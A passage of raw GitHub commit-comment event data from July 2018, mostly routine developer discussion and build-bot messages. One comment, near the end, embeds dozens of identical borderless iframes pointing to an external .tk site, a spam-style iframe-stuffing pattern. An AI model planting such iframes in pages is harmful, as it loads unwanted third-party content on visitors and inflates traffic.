{"id":"7967361545","type":"CommitCommentEvent","actor":{"login":"DoriLee1115"},"repo":{"name":"DoriLee1115/lmis-tieics2017"},"payload":{"comment":{"id":29712852,"position":null,"line":null,"path":null,"commit_id":"07b94e7661317817909720fbeeb1415addce014b","created_at":"2018-07-15T13:21:54Z","updated_at":"2018-07-15T13:21:54Z","author_association":"OWNER","body":"If you want to use **POSTMAN** to test the 'POST' method, the style of 'orderTime' should be '**YYYY\\MM\\DD HH:MM:SS**'.\r\n"}},"created_at":"2018-07-15T13:21:54Z"}
{"id":"7967372680","type":"CommitCommentEvent","actor":{"login":"kevinhendricks"},"repo":{"name":"Sigil-Ebook/Sigil"},"payload":{"comment":{"id":29712865,"position":null,"line":null,"path":null,"commit_id":"6e1594eea61661dfd56b28e99358c14cbe8904db","created_at":"2018-07-15T13:29:29Z","updated_at":"2018-07-15T13:29:29Z","author_association":"CONTRIBUTOR","body":"They already exist in the tree and can be dowmloaded via Github's support for raw files.  Closing this as they already exist and can be easily downloaded."}},"created_at":"2018-07-15T13:29:29Z"}
{"id":"7967373520","type":"CommitCommentEvent","actor":{"login":"ShadySquirrel"},"repo":{"name":"abraunegg/onedrive"},"payload":{"comment":{"id":29712868,"position":6,"line":31,"path":"Makefile","commit_id":"6fb0cee16dfd7bb4a7686162b7bb3cbdcf0a8162","created_at":"2018-07-15T13:30:02Z","updated_at":"2018-07-15T13:30:02Z","author_association":"NONE","body":"It's older syntax, I use it mostly when usernames don't have dots, like in this case. It should be valid as long as system isn't using non-compilant coreutils."}},"created_at":"2018-07-15T13:30:02Z"}
{"id":"7967376937","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":29712877,"position":null,"line":null,"path":null,"commit_id":"9598a77032c6e56e35f3d70faab624c0bdf1b453","created_at":"2018-07-15T13:32:20Z","updated_at":"2018-07-15T13:32:20Z","author_association":"CONTRIBUTOR","body":"Trying to be both polite and serious, I have no idea what most of that means. All of that was how it was done in oblivion by previous authors like lojack and Pacific morrowind. Which is why its present in all of the record decoding.\r\n\r\nThat doesn't mean it can't change but it's not something I would understand much. My big concern with my limited knowledge of what slots does, is if removed how is one making sure the attributes are still accessable.\r\n\r\nProbably a little too technical for us to discuss right now. About the only thing I have time for is just my real life job. I'm sure you can relate. \r\n\r\nLittle by little I'm going to try and add Fallout 4 records to wrye bash but I'm still going to use the old way of doing it for now. It's all I know and I have to stick with a format that works because I need to test with sample plugins.\r\n\r\nAlso Elminster is helping with some code changes to xEdit so my focus will be on that mostly."}},"created_at":"2018-07-15T13:32:20Z"}
{"id":"7967378246","type":"CommitCommentEvent","actor":{"login":"zenany"},"repo":{"name":"zenany/weekly"},"payload":{"comment":{"id":29712879,"position":32,"line":32,"path":"software/2018/0709.md","commit_id":"46cef5028b5d773d46cbeb3e88b2e7d9aca04761","created_at":"2018-07-15T13:33:20Z","updated_at":"2018-07-15T13:33:20Z","author_association":"OWNER","body":"看来是个有洁癖的工程师😀"}},"created_at":"2018-07-15T13:33:20Z"}
{"id":"7967378369","type":"CommitCommentEvent","actor":{"login":"dyancarlos"},"repo":{"name":"dyancarlos/apiary-docs"},"payload":{"comment":{"id":29712880,"position":null,"line":null,"path":null,"commit_id":"6288e5dc1b1722a9d7fcb91f3a1245b1d68f20f4","created_at":"2018-07-15T13:33:26Z","updated_at":"2018-07-15T13:33:26Z","author_association":"OWNER","body":"__API Description file syntax error on line 4__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-15T13:33:26Z"}
{"id":"7967380139","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712883,"position":null,"line":null,"path":null,"commit_id":"ad15e3194b2f6fec8eb72dc1180e90349fa3be60","created_at":"2018-07-15T13:34:47Z","updated_at":"2018-07-15T13:34:47Z","author_association":"NONE","body":"#6476-EquationFix (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2980 of 2980 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T13:34:47Z"}
{"id":"7967380640","type":"CommitCommentEvent","actor":{"login":"syberant"},"repo":{"name":"splintah/game-of-life"},"payload":{"comment":{"id":29712884,"position":null,"line":null,"path":null,"commit_id":"ce657f1f2d56e291b95ac16935dfe39b9ef76a25","created_at":"2018-07-15T13:35:11Z","updated_at":"2018-07-15T13:35:11Z","author_association":"COLLABORATOR","body":"**NOTE:** The bug this caused has been fixed by reverting this commit entirely in b932f9037431e0907b4e211dc6d1a6334907b1ac."}},"created_at":"2018-07-15T13:35:11Z"}
{"id":"7967382104","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":29712886,"position":null,"line":null,"path":null,"commit_id":"9598a77032c6e56e35f3d70faab624c0bdf1b453","created_at":"2018-07-15T13:36:15Z","updated_at":"2018-07-15T13:36:15Z","author_association":"MEMBER","body":"Ok - well it's just a simple change as I do here - I understand if you have no time but if you get round to it it's just removing the BaseClass slots from subclasses as I do here. Thanks anyway!"}},"created_at":"2018-07-15T13:36:15Z"}
{"id":"7967382818","type":"CommitCommentEvent","actor":{"login":"hawkeye116477"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712887,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T13:36:46Z","updated_at":"2018-07-15T13:36:46Z","author_association":"CONTRIBUTOR","body":"Trzecia reguła chyba nie działa, ale druga raczej jest ok :smile:."}},"created_at":"2018-07-15T13:36:46Z"}
{"id":"7967384922","type":"CommitCommentEvent","actor":{"login":"generic-github-user"},"repo":{"name":"generic-github-user/tfjs-visual-editor"},"payload":{"comment":{"id":29712890,"position":null,"line":null,"path":null,"commit_id":"a60bb42f5eed30de18bc9eb7fdc8519b8f749fd5","created_at":"2018-07-15T13:38:20Z","updated_at":"2018-07-15T13:38:20Z","author_association":"OWNER","body":"Removed FAB buttons (they are now normal buttons) because FABs do not support accented color themes or the MDL raised button style. Also, apparently I wasn't \"supposed\" to use them this way anyway:\r\n\r\n![image](https://user-images.githubusercontent.com/40661852/42734475-755afc9a-8812-11e8-88f0-dc15021e4b6e.png)\r\n\r\nFrom https://material.io/design/components/buttons-floating-action-button.html#usage."}},"created_at":"2018-07-15T13:38:20Z"}
{"id":"7967384969","type":"CommitCommentEvent","actor":{"login":"edieblu"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29712891,"position":4,"line":6,"path":"package.json","commit_id":"a736fcd401cf6b5ead5b39a7c09d25831df5ff1f","created_at":"2018-07-15T13:38:22Z","updated_at":"2018-07-15T13:38:22Z","author_association":"COLLABORATOR","body":"Hi @teleivo, yes, Georgina added husky, lint-staged and prettier on Friday (she might've used npm, not yarn though).\r\n\r\nI've just run the command to format the project in prettier for the first time as well. "}},"created_at":"2018-07-15T13:38:22Z"}
{"id":"7967385038","type":"CommitCommentEvent","actor":{"login":"cjnstha"},"repo":{"name":"cjnstha/foodmin"},"payload":{"comment":{"id":29712892,"position":null,"line":null,"path":null,"commit_id":"9966564c6d8727a4fe53c3b87d3d72534308afb8","created_at":"2018-07-15T13:38:25Z","updated_at":"2018-07-15T13:38:25Z","author_association":"OWNER","body":"thik xa"}},"created_at":"2018-07-15T13:38:25Z"}
{"id":"7967385600","type":"CommitCommentEvent","actor":{"login":"Binayak48201"},"repo":{"name":"cjnstha/foodmin"},"payload":{"comment":{"id":29712893,"position":null,"line":null,"path":null,"commit_id":"9966564c6d8727a4fe53c3b87d3d72534308afb8","created_at":"2018-07-15T13:38:50Z","updated_at":"2018-07-15T13:38:50Z","author_association":"NONE","body":"Think chinna"}},"created_at":"2018-07-15T13:38:50Z"}
{"id":"7967386619","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712896,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T13:39:33Z","updated_at":"2018-07-15T13:39:33Z","author_association":"COLLABORATOR","body":"Trzecia jest pod wpisy blogowe, tam ta portalowa nie chce działać.\r\n"}},"created_at":"2018-07-15T13:39:33Z"}
{"id":"7967386699","type":"CommitCommentEvent","actor":{"login":"edieblu"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29712897,"position":4,"line":6,"path":"package.json","commit_id":"a736fcd401cf6b5ead5b39a7c09d25831df5ff1f","created_at":"2018-07-15T13:39:38Z","updated_at":"2018-07-15T13:39:38Z","author_association":"COLLABORATOR","body":"Should we have used yarn or is either of them fine?"}},"created_at":"2018-07-15T13:39:38Z"}
{"id":"7967386851","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712898,"position":null,"line":null,"path":null,"commit_id":"ad15e3194b2f6fec8eb72dc1180e90349fa3be60","created_at":"2018-07-15T13:39:44Z","updated_at":"2018-07-15T13:39:44Z","author_association":"NONE","body":"#6476-EquationFix (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ad15e3194b2f6fec8eb72dc1180e90349fa3be60-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T13:39:44Z"}
{"id":"7967386940","type":"CommitCommentEvent","actor":{"login":"JamieGits"},"repo":{"name":"JamieGits/nodejs"},"payload":{"comment":{"id":29712899,"position":null,"line":null,"path":null,"commit_id":"1587928bc5a907a36b013487993a331a63cc7eba","created_at":"2018-07-15T13:39:48Z","updated_at":"2018-07-15T13:39:48Z","author_association":"OWNER","body":"node"}},"created_at":"2018-07-15T13:39:48Z"}
{"id":"7967387013","type":"CommitCommentEvent","actor":{"login":"dyancarlos"},"repo":{"name":"dyancarlos/apiary-docs"},"payload":{"comment":{"id":29712900,"position":null,"line":null,"path":null,"commit_id":"6288e5dc1b1722a9d7fcb91f3a1245b1d68f20f4","created_at":"2018-07-15T13:39:51Z","updated_at":"2018-07-15T13:39:51Z","author_association":"OWNER","body":"__API Description file syntax error on line 4__: the use of tab(s) '\\t' in source data isn't currently supported, please contact makers (Autogenerated message from apiary.io)"}},"created_at":"2018-07-15T13:39:51Z"}
{"id":"7967389379","type":"CommitCommentEvent","actor":{"login":"zalewskigrzegorz"},"repo":{"name":"Dilven/first_task"},"payload":{"comment":{"id":29712905,"position":1,"line":1,"path":"README.md","commit_id":"3370825190f85d00360a6fdfa3cf34cc1216c26c","created_at":"2018-07-15T13:41:33Z","updated_at":"2018-07-15T13:41:33Z","author_association":"NONE","body":"uzyj docker compose aby postawic srodowisko\r\n\r\n`version: '2' \r\nservices: \r\n \r\n  db: \r\n    image: postgres:latest \r\n    ports: \r\n      - \"5432:5432\" \r\n    restart: always \r\n    environment: \r\n      POSTGRES_PASSWORD: password \r\n      POSTGRES_USER: dilven \r\n      POSTGRES_DB: shop \r\n \r\n  els: \r\n    image: elasticsearch:latest \r\n    ports: \r\n      - \"9200:9200\" \r\n      - \"9300:9300\" `"}},"created_at":"2018-07-15T13:41:33Z"}
{"id":"7967391741","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29712907,"position":4,"line":132,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"5a3276ea242fd8fb10d3a1d8373598f660c058e1","created_at":"2018-07-15T13:43:20Z","updated_at":"2018-07-15T13:43:20Z","author_association":"COLLABORATOR","body":"\"ne\" kelimesini kastediyorum sadece\n\nOn Sun, Jul 15, 2018, 3:49 PM koguzhan <notifications@github.com> wrote:\n\n> Bidixte bunlar hep adv-itg idi baştan beri, ondan böyle yaptım. Prn-itg de\n> mi yapalım hepsini?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/5a3276ea242fd8fb10d3a1d8373598f660c058e1#commitcomment-29712775>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2hXU7jwALHa6qNuaarFPw_dl9Yauks5uGzprgaJpZM4VQN0u>\n> .\n>\n"}},"created_at":"2018-07-15T13:43:20Z"}
{"id":"7967395103","type":"CommitCommentEvent","actor":{"login":"TheAssassin"},"repo":{"name":"AppImage/AppImageKit"},"payload":{"comment":{"id":29712911,"position":null,"line":null,"path":null,"commit_id":"bc339d2210fca95d95f682c5a20c0718ea199be4","created_at":"2018-07-15T13:45:47Z","updated_at":"2018-07-15T13:45:47Z","author_association":"MEMBER","body":"> This still needs to work, as I use it e.g., to easily repackage existing mounted AppImages with the latest AppImage tools.\r\n\r\nThere's quite a bunch of other modifications that are being applied to an AppDir, e.g., `.DirIcon` and quite a few other things. I don't see why we should allow read-only AppDirs. It's never been a priority."}},"created_at":"2018-07-15T13:45:47Z"}
{"id":"7967396232","type":"CommitCommentEvent","actor":{"login":"hawkeye116477"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712914,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T13:46:39Z","updated_at":"2018-07-15T13:46:39Z","author_association":"CONTRIBUTOR","body":"Ok, jeszcze dojdzie `dobreprogramy.pl##.float-right.social` na małe ikonki przy wpisach blogowych."}},"created_at":"2018-07-15T13:46:39Z"}
{"id":"7967399132","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712922,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T13:48:47Z","updated_at":"2018-07-15T13:48:47Z","author_association":"COLLABORATOR","body":"OK, może być - nie reaguje na portalowy przycisk polubienia artykułu (dodania do listy ulubionych)."}},"created_at":"2018-07-15T13:48:47Z"}
{"id":"7967399871","type":"CommitCommentEvent","actor":{"login":"Palabola"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29712926,"position":null,"line":null,"path":null,"commit_id":"014ea6354d3de32b9bf460c4f96637e4d1a9a422","created_at":"2018-07-15T13:49:17Z","updated_at":"2018-07-15T13:49:17Z","author_association":"CONTRIBUTOR","body":"(Y) Thx!"}},"created_at":"2018-07-15T13:49:17Z"}
{"id":"7967401339","type":"CommitCommentEvent","actor":{"login":"nnxue"},"repo":{"name":"gsecho/test3"},"payload":{"comment":{"id":29712935,"position":null,"line":null,"path":null,"commit_id":"a6430ae05dba944ce08b5f064a41d26d4c473c8c","created_at":"2018-07-15T13:50:23Z","updated_at":"2018-07-15T13:50:23Z","author_association":"NONE","body":"test reply"}},"created_at":"2018-07-15T13:50:23Z"}
{"id":"7967401542","type":"CommitCommentEvent","actor":{"login":"bulu01"},"repo":{"name":"bulu01/github01"},"payload":{"comment":{"id":29712936,"position":null,"line":null,"path":null,"commit_id":"9d66b8304ac130aa110069de02b8268046c69c3f","created_at":"2018-07-15T13:50:33Z","updated_at":"2018-07-15T13:50:33Z","author_association":"OWNER","body":"hiii'''l"}},"created_at":"2018-07-15T13:50:33Z"}
{"id":"7967401771","type":"CommitCommentEvent","actor":{"login":"bulu01"},"repo":{"name":"bulu01/github01"},"payload":{"comment":{"id":29712937,"position":null,"line":null,"path":null,"commit_id":"9d66b8304ac130aa110069de02b8268046c69c3f","created_at":"2018-07-15T13:50:43Z","updated_at":"2018-07-15T13:50:43Z","author_association":"OWNER","body":"hell"}},"created_at":"2018-07-15T13:50:43Z"}
{"id":"7967406022","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712940,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T13:53:43Z","updated_at":"2018-07-15T13:53:43Z","author_association":"COLLABORATOR","body":"`##.tools-social` i może wyjątek na fanboya: `www.dobreprogramy.pl#@#.social-wrapper`, by odblokować przycisk dodawania programów do ulubionych:\r\n\r\n`https://www.dobreprogramy.pl/AdwCleaner,Program,Windows,38865.html`"}},"created_at":"2018-07-15T13:53:43Z"}
{"id":"7967408738","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"glinscott/fishtest"},"payload":{"comment":{"id":29712949,"position":null,"line":null,"path":null,"commit_id":"3009a1143d16fb609105c8659a06468c82fe1f5c","created_at":"2018-07-15T13:55:42Z","updated_at":"2018-07-15T13:55:42Z","author_association":"COLLABORATOR","body":"Hi @RensDeVries , it looks like you did quite some work here!\r\n\r\nIf you put this in a another branch on your repo, and you sinc with official master, it would maybe make sense to open a PR on the official master to get some ogranized feedback. "}},"created_at":"2018-07-15T13:55:42Z"}
{"id":"7967411128","type":"CommitCommentEvent","actor":{"login":"AlexZhuk88"},"repo":{"name":"AlexZhuk88/AlexZhuk"},"payload":{"comment":{"id":29712952,"position":77,"line":77,"path":"src/Modul1/HW1Function/Task1.java","commit_id":"f8c673619258b14c185b07ab74da03a74182ddba","created_at":"2018-07-15T13:57:26Z","updated_at":"2018-07-15T13:57:26Z","author_association":"OWNER","body":"Зато работает как часы)))"}},"created_at":"2018-07-15T13:57:26Z"}
{"id":"7967411427","type":"CommitCommentEvent","actor":{"login":"edieblu"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29712953,"position":4,"line":6,"path":"package.json","commit_id":"a736fcd401cf6b5ead5b39a7c09d25831df5ff1f","created_at":"2018-07-15T13:57:40Z","updated_at":"2018-07-15T13:57:40Z","author_association":"COLLABORATOR","body":"Hi @teleivo ignore my previous question. I've just realized I didn't actually run `yarn install` at any point so now it should be there. I've updated the latest version, let me know if it's okay. I've also had some issues running npm test, had to install watchman as per here: https://github.com/facebook/create-react-app/issues/871\r\n\r\nNow everything seems to be working! :) "}},"created_at":"2018-07-15T13:57:40Z"}
{"id":"7967413539","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":29712954,"position":null,"line":null,"path":null,"commit_id":"9598a77032c6e56e35f3d70faab624c0bdf1b453","created_at":"2018-07-15T13:59:16Z","updated_at":"2018-07-15T13:59:16Z","author_association":"CONTRIBUTOR","body":"Neither of is have much time I would suspect. :)\r\n\r\nI will try my best to make those changes as I go as long as I understand the change once I dig into things again.\r\n\r\nThanks for pointing out that it's a fairly simple change, I'll try my best."}},"created_at":"2018-07-15T13:59:16Z"}
{"id":"7967413780","type":"CommitCommentEvent","actor":{"login":"zordak7"},"repo":{"name":"bizlift/bittube-miner-hive"},"payload":{"comment":{"id":29712955,"position":null,"line":null,"path":null,"commit_id":"f6f15a713df2e2bed129b4bb99e432372a0b8aed","created_at":"2018-07-15T13:59:27Z","updated_at":"2018-07-15T13:59:27Z","author_association":"NONE","body":"I was able to solve the problem\r\nI removed everything and made it\r\nThanks for the instruction\r\nI hope that you will not only deal with this project"}},"created_at":"2018-07-15T13:59:27Z"}
{"id":"7967414405","type":"CommitCommentEvent","actor":{"login":"pedrofracassi"},"repo":{"name":"SwitchbladeBot/bladey-api"},"payload":{"comment":{"id":29712956,"position":5,"line":5,"path":"index.js","commit_id":"06b39deb85e5b10a0704fb06b4356220a6e80c31","created_at":"2018-07-15T13:59:56Z","updated_at":"2018-07-15T13:59:56Z","author_association":"MEMBER","body":"res.json({stuff})"}},"created_at":"2018-07-15T13:59:56Z"}
{"id":"7967414654","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29712962,"position":null,"line":null,"path":null,"commit_id":"242dba13b7bc97e0e7170423223fa24c6d33baac","created_at":"2018-07-15T14:00:08Z","updated_at":"2018-07-15T14:00:08Z","author_association":"OWNER","body":"高阶函数\r\n```\r\n#Downtiser\r\ndef add(a,b,f):\r\n    return f(a)+f(b)\r\n\r\n\r\nprint(add(-3,-4,abs))  #将函数作为参数传入另一个函数\r\n```\r\n"}},"created_at":"2018-07-15T14:00:08Z"}
{"id":"7967414744","type":"CommitCommentEvent","actor":{"login":"vinriviere"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29712963,"position":null,"line":null,"path":null,"commit_id":"8c4bca527159d8c3143a67074fec39f7c8299d41","created_at":"2018-07-15T14:00:11Z","updated_at":"2018-07-15T14:00:11Z","author_association":"MEMBER","body":"With Git, history is never preserved when a file is renamed. \"git mv\" is just a shortcut to \"git rm\" then \"git add\".\r\n**But** the `--follow` log option is smart enough to detect renames based on file contents similarity.\r\nSo do what you have to do, feel free to rename/remove/re-add files, Git will always see the right thing 😃"}},"created_at":"2018-07-15T14:00:11Z"}
{"id":"7967415588","type":"CommitCommentEvent","actor":{"login":"igneus"},"repo":{"name":"TheBigBrainsCompany/TbbcMoneyBundle"},"payload":{"comment":{"id":29712969,"position":null,"line":null,"path":null,"commit_id":"417a94d111d97feb5453e02c5c92b575e9c41381","created_at":"2018-07-15T14:00:39Z","updated_at":"2018-07-15T14:00:39Z","author_association":"NONE","body":":fearful: :scream: "}},"created_at":"2018-07-15T14:00:39Z"}
{"id":"7967418332","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29712970,"position":null,"line":null,"path":null,"commit_id":"5fa766896bf409d00ae19f4c497f7cb36d1b0d09","created_at":"2018-07-15T14:02:24Z","updated_at":"2018-07-15T14:02:24Z","author_association":"CONTRIBUTOR","body":"Guys, you drive me mad. As already said, that name is only used in 2 places. Anyway, i've changed that now again."}},"created_at":"2018-07-15T14:02:24Z"}
{"id":"7967419316","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29712972,"position":null,"line":null,"path":null,"commit_id":"bbe8df36389f19e4a5398b227e7558e05258ec01","created_at":"2018-07-15T14:03:07Z","updated_at":"2018-07-15T14:03:07Z","author_association":"OWNER","body":"The above code is a better explanation on how to add urls to cache, all at once."}},"created_at":"2018-07-15T14:03:07Z"}
{"id":"7967419814","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29712974,"position":null,"line":null,"path":null,"commit_id":"7f1a7ae8d9766c4bf3a41d0715acb781c97e62b3","created_at":"2018-07-15T14:03:28Z","updated_at":"2018-07-15T14:03:28Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[2] Projet výjimky v adminu](https://trello.com/c/PDpj150K/636-2-projet-v%C3%BDjimky-v-adminu)"}},"created_at":"2018-07-15T14:03:28Z"}
{"id":"7967423732","type":"CommitCommentEvent","actor":{"login":"diddooe"},"repo":{"name":"diddooe/sport"},"payload":{"comment":{"id":29712979,"position":null,"line":null,"path":null,"commit_id":"b6ac5a6b53f0778c433a7a8775ad1dc091e7502d","created_at":"2018-07-15T14:06:15Z","updated_at":"2018-07-15T14:06:15Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<html>\r\n<head>\r\n  <title>Hi there</title>\r\n</head>\r\n<body>\r\n  This is a page\r\n  a simple page\r\n</body>\r\n</html>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe src=\"http://www.livre2livre.tk/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"no\" frameborder=\"1\" marginheight=\"0px\" marginwidth=\"0px\" height=\"400px\" width=\"600px\" allowfullscreen></iframe>\r\n<iframe 